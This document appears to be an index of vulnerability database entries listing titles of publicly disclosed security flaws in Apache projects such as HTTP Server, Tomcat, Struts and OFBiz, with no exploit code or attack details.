| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
| [59019] Apache mod_python Cookie Salting Weakness
| [59018] Apache Harmony Error Message Handling Overflow
| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
| [59010] Apache Solr get-file.jsp XSS
| [59009] Apache Solr action.jsp XSS
| [59008] Apache Solr analysis.jsp XSS
| [59007] Apache Solr schema.jsp Multiple Parameter XSS
| [59006] Apache Beehive select / checkbox Tag XSS
| [59005] Apache Beehive jpfScopeID Global Parameter XSS
| [59004] Apache Beehive Error Message XSS
| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
| [59002] Apache Jetspeed default-page.psml URI XSS
| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
| [59000] Apache CXF Unsigned Message Policy Bypass
| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
| [58993] Apache Hadoop browseBlock.jsp XSS
| [58991] Apache Hadoop browseDirectory.jsp XSS
| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
6492| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
6493| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
6494| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
